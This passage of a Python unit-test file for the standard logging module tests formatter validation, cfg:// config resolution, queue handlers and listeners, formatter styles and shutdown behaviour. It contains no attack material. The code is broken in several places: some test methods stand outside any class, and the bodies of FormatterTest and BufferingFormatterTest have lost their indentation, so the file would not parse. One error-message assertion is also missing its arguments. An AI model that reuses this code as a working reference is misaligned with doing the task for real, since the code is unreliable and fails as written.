    self.apply_config(self.custom_formatter_class_validate)
    handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
    self.assertIsInstance(handler.formatter, ExceptionFormatter)

def test_custom_formatter_class_with_validate2(self):
    """A custom Formatter subclass via 'class' with validate=False is accepted."""
    self.apply_config(self.custom_formatter_class_validate2)
    handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
    self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
    """A style that doesn't match the format string must still be accepted,
    because the formatter config sets 'validate': False."""
    # Use deepcopy, not dict.copy(): a shallow copy shares the nested
    # 'formatters'/'form1' dicts with the class-level
    # custom_formatter_class_validate, so adding 'style' here would leak
    # into every other test that uses that config.
    config = copy.deepcopy(self.custom_formatter_class_validate)
    config['formatters']['form1']['style'] = "$"

    # Exception should not be raised as we have configured 'validate' to False
    self.apply_config(config)
    handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
    self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
    """A 'class' that is not a logging.Formatter subclass must be rejected
    even with validate=False."""
    self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)

def test_custom_formatter_function_with_validate(self):
    """A plain function is not acceptable for the 'class' machinery here."""
    self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)

def test_baseconfig(self):
    """Exercise BaseConfigurator's cfg:// resolution: indexing, attribute
    access, nesting, and the error cases."""
    d = {
        'atuple': (1, 2, 3),
        'alist': ['a', 'b', 'c'],
        'adict': {'d': 'e', 'f': 3 },
        'nest1': ('g', ('h', 'i'), 'j'),
        'nest2': ['k', ['l', 'm'], 'n'],
        'nest3': ['o', 'cfg://alist', 'p'],
    }
    bc = logging.config.BaseConfigurator(d)
    self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
    self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
    self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
    self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
    self.assertEqual(bc.convert('cfg://adict.d'), 'e')
    self.assertEqual(bc.convert('cfg://adict[f]'), 3)
    v = bc.convert('cfg://nest3')
    self.assertEqual(v.pop(1), ['a', 'b', 'c'])
    self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
    self.assertRaises(ValueError, bc.convert, 'cfg://!')
    self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')

def test_namedtuple(self):
    # see bpo-39142
    """A namedtuple passed as a handler constructor argument must survive
    dictConfig's conversion machinery intact."""
    from collections import namedtuple

    class MyHandler(logging.StreamHandler):
        def __init__(self, resource, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self.resource: namedtuple = resource

        def emit(self, record):
            record.msg += f' {self.resource.type}'
            return super().emit(record)

    Resource = namedtuple('Resource', ['type', 'labels'])
    resource = Resource(type='my_type', labels=['a'])

    config = {
        'version': 1,
        'handlers': {
            'myhandler': {
                '()': MyHandler,
                'resource': resource
            }
        },
        'root':  {'level': 'INFO', 'handlers': ['myhandler']},
    }
    with support.captured_stderr() as stderr:
        self.apply_config(config)
        logging.info('some log')
    self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
    """Tests for logging.Manager."""

    def test_manager_loggerclass(self):
        """setLoggerClass must validate its argument and affect only
        loggers created through this manager, not the global root."""
        logged = []

        class MyLogger(logging.Logger):
            def _log(self, level, msg, args, exc_info=None, extra=None):
                logged.append(msg)

        man = logging.Manager(None)
        # Non-Logger classes are rejected.
        self.assertRaises(TypeError, man.setLoggerClass, int)
        man.setLoggerClass(MyLogger)
        logger = man.getLogger('test')
        logger.warning('should appear in logged')
        # Goes through the default root logger, not our manager.
        logging.warning('should not appear in logged')

        self.assertEqual(logged, ['should appear in logged'])

    def test_set_log_record_factory(self):
        """setLogRecordFactory must store the factory verbatim."""
        man = logging.Manager(None)
        expected = object()
        man.setLogRecordFactory(expected)
        self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
    """Tests for Logger.getChild()."""

    def test_child_loggers(self):
        """getChild() must return the very same Logger objects that
        getLogger() yields for the equivalent dotted names."""
        root = logging.getLogger()
        abc = logging.getLogger('abc')
        logging.getLogger('def.ghi')  # create an unrelated dotted logger
        # Children of the root logger are just top-level loggers.
        self.assertIs(root.getChild('xyz'), logging.getLogger('xyz'))
        self.assertIs(root.getChild('uvw.xyz'), logging.getLogger('uvw.xyz'))
        # Children of a named logger get the dotted prefix; a multi-part
        # suffix is equivalent to chained single-part getChild() calls.
        child = abc.getChild('def')
        grandchild = child.getChild('ghi')
        self.assertIs(child, logging.getLogger('abc.def'))
        self.assertIs(grandchild, logging.getLogger('abc.def.ghi'))
        self.assertIs(grandchild, abc.getChild('def.ghi'))
# Trivial LogRecord subclass used by LogRecordFactoryTest below to verify
# that a custom record factory is actually consulted.
class DerivedLogRecord(logging.LogRecord):
    pass
class LogRecordFactoryTest(BaseTest):
    """Tests for logging.setLogRecordFactory()/getLogRecordFactory()."""

    def setUp(self):
        class CheckingFilter(logging.Filter):
            """Filter that raises TypeError unless every record is of
            the expected class — used to detect which factory ran."""

            def __init__(self, cls):
                self.cls = cls

            def filter(self, record):
                t = type(record)
                if t is not self.cls:
                    msg = 'Unexpected LogRecord type %s, expected %s' % (t,
                            self.cls)
                    raise TypeError(msg)
                return True

        BaseTest.setUp(self)
        self.filter = CheckingFilter(DerivedLogRecord)
        self.root_logger.addFilter(self.filter)
        # Remember the original factory so tearDown can restore it.
        self.orig_factory = logging.getLogRecordFactory()

    def tearDown(self):
        self.root_logger.removeFilter(self.filter)
        BaseTest.tearDown(self)
        logging.setLogRecordFactory(self.orig_factory)

    def test_logrecord_class(self):
        """Logging fails the class check until the derived factory is
        installed, then succeeds."""
        self.assertRaises(TypeError, self.root_logger.warning,
                          self.next_message())
        logging.setLogRecordFactory(DerivedLogRecord)
        self.root_logger.error(self.next_message())
        self.assert_log_lines([
           ('root', 'ERROR', '2'),
        ])
class QueueHandlerTest(BaseTest):
    """Tests for logging.handlers.QueueHandler / QueueListener."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        self.queue = queue.Queue(-1)
        self.que_hdlr = logging.handlers.QueueHandler(self.queue)
        self.name = 'que'
        self.que_logger = logging.getLogger('que')
        self.que_logger.propagate = False
        self.que_logger.setLevel(logging.WARNING)
        self.que_logger.addHandler(self.que_hdlr)

    def tearDown(self):
        self.que_hdlr.close()
        BaseTest.tearDown(self)

    def test_queue_handler(self):
        """Only records at/above the logger level must land on the queue."""
        self.que_logger.debug(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        self.que_logger.info(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        msg = self.next_message()
        self.que_logger.warning(msg)
        data = self.queue.get_nowait()
        self.assertTrue(isinstance(data, logging.LogRecord))
        self.assertEqual(data.name, self.que_logger.name)
        self.assertEqual((data.msg, data.args), (msg, None))

    def test_formatting(self):
        """QueueHandler must pre-format the record before enqueueing it."""
        msg = self.next_message()
        levelname = logging.getLevelName(logging.WARNING)
        log_format_str = '{name} -> {levelname}: {message}'
        formatted_msg = log_format_str.format(name=self.name,
                                              levelname=levelname, message=msg)
        formatter = logging.Formatter(self.log_format)
        self.que_hdlr.setFormatter(formatter)
        self.que_logger.warning(msg)
        log_record = self.queue.get_nowait()
        self.assertEqual(formatted_msg, log_record.msg)
        self.assertEqual(formatted_msg, log_record.message)

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener(self):
        """QueueListener must hand every queued record to its handler;
        with respect_handler_level set, the handler's own level applies."""
        handler = support.TestHandler(support.Matcher())
        listener = logging.handlers.QueueListener(self.queue, handler)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
        self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
        handler.close()

        # Now test with respect_handler_level set
        handler = support.TestHandler(support.Matcher())
        handler.setLevel(logging.CRITICAL)
        listener = logging.handlers.QueueListener(self.queue, handler,
                                                  respect_handler_level=True)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
        self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
        handler.close()

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener_with_StreamHandler(self):
        # Test that traceback only appends once (bpo-34334).
        listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
        listener.start()
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.que_logger.exception(self.next_message(), exc_info=exc)
        listener.stop()
        self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)

    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener_with_multiple_handlers(self):
        # Test that queue handler format doesn't affect other handler formats (bpo-35726).
        self.que_hdlr.setFormatter(self.root_formatter)
        self.que_logger.addHandler(self.root_hdlr)

        listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
        listener.start()
        self.que_logger.error("error")
        listener.stop()
        self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
    import multiprocessing
    from unittest.mock import patch

    class QueueListenerTest(BaseTest):
        """
        Tests based on patch submitted for issue #27930. Ensure that
        QueueListener handles all log messages.
        """

        repeat = 20

        @staticmethod
        def setup_and_log(log_queue, ident):
            """
            Creates a logger with a QueueHandler that logs to a queue read by a
            QueueListener. Starts the listener, logs five messages, and stops
            the listener.
            """
            logger = logging.getLogger('test_logger_with_id_%s' % ident)
            logger.setLevel(logging.DEBUG)
            handler = logging.handlers.QueueHandler(log_queue)
            logger.addHandler(handler)
            listener = logging.handlers.QueueListener(log_queue)
            listener.start()

            logger.info('one')
            logger.info('two')
            logger.info('three')
            logger.info('four')
            logger.info('five')

            listener.stop()
            logger.removeHandler(handler)
            handler.close()

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_queue_queue(self, mock_handle):
            for i in range(self.repeat):
                log_queue = queue.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_mp_queue(self, mock_handle):
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                log_queue.close()
                log_queue.join_thread()
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')

        @staticmethod
        def get_all_from_queue(log_queue):
            """Yield every item currently in `log_queue` until it is empty."""
            try:
                while True:
                    yield log_queue.get_nowait()
            except queue.Empty:
                # Bare return ends the generator; the previous `return []`
                # only set an unused StopIteration.value.
                return

        def test_no_messages_in_queue_after_stop(self):
            """
            Five messages are logged then the QueueListener is stopped. This
            test then gets everything off the queue. Failure of this test
            indicates that messages were not registered on the queue until
            _after_ the QueueListener stopped.
            """
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                # Renamed from `queue` to avoid shadowing the queue module
                # (which get_all_from_queue's except clause relies on).
                mp_queue = multiprocessing.Queue()
                self.setup_and_log(mp_queue, '%s_%s' % (self.id(), i))
                # time.sleep(1)
                items = list(self.get_all_from_queue(mp_queue))
                mp_queue.close()
                mp_queue.join_thread()

                expected = [[], [logging.handlers.QueueListener._sentinel]]
                self.assertIn(items, expected,
                              'Found unexpected messages in queue: %s' % (
                                    [m.msg if isinstance(m, logging.LogRecord)
                                     else m for m in items]))

        def test_calls_task_done_after_stop(self):
            # Issue 36813: Make sure queue.join does not deadlock.
            log_queue = queue.Queue()
            listener = logging.handlers.QueueListener(log_queue)
            listener.start()
            listener.stop()
            with self.assertRaises(ValueError):
                # Make sure all tasks are done and .join won't block.
                log_queue.task_done()
# Zero offset, shared by utcoffset() and dst() below.
ZERO = datetime.timedelta(0)

class UTC(datetime.tzinfo):
    """Minimal fixed-offset UTC tzinfo used by the formatter tests."""

    def utcoffset(self, dt):
        return ZERO

    # DST offset for UTC is also always zero, so reuse the same method.
    dst = utcoffset

    def tzname(self, dt):
        return 'UTC'

# Module-level singleton instance.
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
    """Define the LogRecord attribute dicts used by get_record():
    `common` holds baseline attributes; `variants` maps a name to an
    overlay dict applied on top of `common`."""
    self.common = {
        'name': 'formatter.test',
        'level': logging.DEBUG,
        'pathname': os.path.join('path', 'to', 'dummy.ext'),
        'lineno': 42,
        'exc_info': None,
        'func': None,
        'msg': 'Message with %d %s',
        'args': (2, 'placeholders'),
    }
    self.variants = {
    }
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
    # Test %-formatting
    """usesTime() must track whether %(asctime)s appears, and unknown
    fields must raise at format time."""
    r = self.get_record()
    f = logging.Formatter('${%(message)s}')
    self.assertEqual(f.format(r), '${Message with 2 placeholders}')
    f = logging.Formatter('%(random)s')
    self.assertRaises(ValueError, f.format, r)
    self.assertFalse(f.usesTime())
    f = logging.Formatter('%(asctime)s')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('%(asctime)-15s')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('%(asctime)#15s')
    self.assertTrue(f.usesTime())

def test_braces(self):
    # Test {}-formatting
    """Same checks as test_percent, for the str.format ('{') style."""
    r = self.get_record()
    f = logging.Formatter('$%{message}%$', style='{')
    self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
    f = logging.Formatter('{random}', style='{')
    self.assertRaises(ValueError, f.format, r)
    f = logging.Formatter("{message}", style='{')
    self.assertFalse(f.usesTime())
    f = logging.Formatter('{asctime}', style='{')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('{asctime!s:15}', style='{')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('{asctime:15}', style='{')
    self.assertTrue(f.usesTime())

def test_dollars(self):
    # Test $-formatting
    """Same checks for string.Template ('$') style, including literal
    '$$' escapes and the bare-$name form."""
    r = self.get_record()
    f = logging.Formatter('${message}', style='$')
    self.assertEqual(f.format(r), 'Message with 2 placeholders')
    f = logging.Formatter('$message', style='$')
    self.assertEqual(f.format(r), 'Message with 2 placeholders')
    f = logging.Formatter('$$%${message}%$$', style='$')
    self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
    f = logging.Formatter('${random}', style='$')
    self.assertRaises(ValueError, f.format, r)
    self.assertFalse(f.usesTime())
    f = logging.Formatter('${asctime}', style='$')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('$asctime', style='$')
    self.assertTrue(f.usesTime())
    f = logging.Formatter('${message}', style='$')
    self.assertFalse(f.usesTime())
    f = logging.Formatter('${asctime}--', style='$')
    self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
    """BufferingFormatter subclass that brackets the batch with its size."""

    def formatHeader(self, records):
        return f'[({len(records)})'

    def formatFooter(self, records):
        return f'({len(records)})]'
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
    """Check that exc_text and stack_info are rendered onto the record."""

    def test_formatting(self):
        logger = self.root_logger
        handler = RecordingHandler()
        logger.addHandler(handler)
        try:
            raise RuntimeError('deliberate mistake')
        except RuntimeError:
            logging.exception('failed', stack_info=True)
        logger.removeHandler(handler)
        handler.close()
        record = handler.records[0]
        # The formatted traceback and stack dump are cached on the record.
        self.assertTrue(record.exc_text.startswith('Traceback (most recent '
                                                   'call last):\n'))
        self.assertTrue(record.exc_text.endswith('\nRuntimeError: '
                                                 'deliberate mistake'))
        self.assertTrue(record.stack_info.startswith('Stack (most recent '
                                                     'call last):\n'))
        self.assertTrue(record.stack_info.endswith('logging.exception(\'failed\', '
                                                   'stack_info=True)'))
class LastResortTest(BaseTest):
    """Tests for logging.lastResort, the fallback handler used when a
    logger has no handlers of its own."""
    def test_last_resort(self):
        # Test the last resort handler
        root = self.root_logger
        root.removeHandler(self.root_hdlr)
        # Save the module globals so the finally block can restore them.
        old_lastresort = logging.lastResort
        old_raise_exceptions = logging.raiseExceptions
        try:
            with support.captured_stderr() as stderr:
                # Below WARNING: the last-resort handler emits nothing.
                root.debug('This should not appear')
                self.assertEqual(stderr.getvalue(), '')
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), 'Final chance!\n')
            # No handlers and no last resort, so 'No handlers' message
            logging.lastResort = None
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                msg = 'No handlers could be found for logger "root"\n'
                self.assertEqual(stderr.getvalue(), msg)
            # 'No handlers' message only printed once
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')
            # If raiseExceptions is False, no message is printed
            root.manager.emittedNoHandlerWarning = False
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')
        finally:
            # Restore the handler and the module-global flags.
            root.addHandler(self.root_hdlr)
            logging.lastResort = old_lastresort
            logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
    """Stand-in handler that records which lifecycle methods were invoked.

    Each of acquire/flush/close/release is replaced by a closure that
    appends '<identifier> - <method>' to the shared `called` list.
    """

    _LIFECYCLE = ('acquire', 'flush', 'close', 'release')

    def __init__(self, identifier, called):
        for name in self._LIFECYCLE:
            setattr(self, name, self.record_call(identifier, name, called))

    def record_call(self, identifier, method_name, called):
        """Return a zero-argument recorder for one lifecycle method."""
        def inner():
            called.append('{} - {}'.format(identifier, method_name))
        return inner
class RecordingHandler(logging.NullHandler):
    """NullHandler variant that remembers every record passed to handle()."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.records = []

    def handle(self, record):
        """Keep track of all the emitted records."""
        self.records.append(record)
class ShutdownTest(BaseTest):
    """Test suite for the shutdown method."""

    def setUp(self):
        super().setUp()
        self.called = []
        # Restore the module-global raiseExceptions flag after each test.
        saved = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', saved)

    def raise_error(self, error):
        """Return a zero-argument callable that raises error()."""
        def inner():
            raise error()
        return inner

    def test_no_failure(self):
        # Fake handlers record every lifecycle call made on them.
        fakes = [FakeHandler(ident, self.called) for ident in range(3)]
        # shutdown() takes live weak references to the handlers.
        refs = [logging.weakref.ref(fake) for fake in fakes]
        logging.shutdown(handlerList=refs)
        # Handlers are processed in reverse registration order, each one
        # going through acquire -> flush -> close -> release.
        expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
                    '1 - acquire', '1 - flush', '1 - close', '1 - release',
                    '0 - acquire', '0 - flush', '0 - close', '0 - release']
        self.assertEqual(expected, self.called)

    def _test_with_failure_in_method(self, method, error):
        handler = FakeHandler(0, self.called)
        setattr(handler, method, self.raise_error(error))
        logging.shutdown(handlerList=[logging.weakref.ref(handler)])
        # release() must still run even when an earlier call failed.
        self.assertEqual('0 - release', self.called[-1])

    def test_with_ioerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', OSError)

    def test_with_ioerror_in_flush(self):
        self._test_with_failure_in_method('flush', OSError)

    def test_with_ioerror_in_close(self):
        self._test_with_failure_in_method('close', OSError)

    def test_with_valueerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', ValueError)

    def test_with_valueerror_in_flush(self):
        self._test_with_failure_in_method('flush', ValueError)

    def test_with_valueerror_in_close(self):
        self._test_with_failure_in_method('close', ValueError)

    def test_with_other_error_in_acquire_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('acquire', IndexError)

    def test_with_other_error_in_flush_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('flush', IndexError)

    def test_with_other_error_in_close_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('close', IndexError)

    def test_with_other_error_in_acquire_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'acquire', IndexError)

    def test_with_other_error_in_flush_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'flush', IndexError)

    def test_with_other_error_in_close_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
    """Test suite for some module level methods."""
    def test_disable(self):
        old_disable = logging.root.manager.disable
        # confirm our assumptions are correct
        self.assertEqual(old_disable, 0)
        self.addCleanup(logging.disable, old_disable)
        logging.disable(83)
        self.assertEqual(logging.root.manager.disable, 83)
        # test the default value introduced in 3.7
        # (Issue #28524)
        logging.disable()
        self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
    def _test_log(self, method, level=None):
        # Drive a module-level convenience function (logging.debug & co.)
        # and check the record it produces.  basicConfig must NOT be
        # invoked here, because a handler is added to root below.
        called = []
        support.patch(self, logging, 'basicConfig',
                      lambda *a, **kw: called.append((a, kw)))
        recording = RecordingHandler()
        logging.root.addHandler(recording)
        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me: %r", recording)
        else:
            log_method("test me: %r", recording)
        self.assertEqual(len(recording.records), 1)
        record = recording.records[0]
        self.assertEqual(record.getMessage(), "test me: %r" % recording)
        expected_level = level if level is not None else getattr(logging, method.upper())
        self.assertEqual(record.levelno, expected_level)
        # basicConfig was not called!
        self.assertEqual(called, [])
    def test_log(self):
        self._test_log('log', logging.ERROR)
    def test_debug(self):
        self._test_log('debug')
    def test_info(self):
        self._test_log('info')
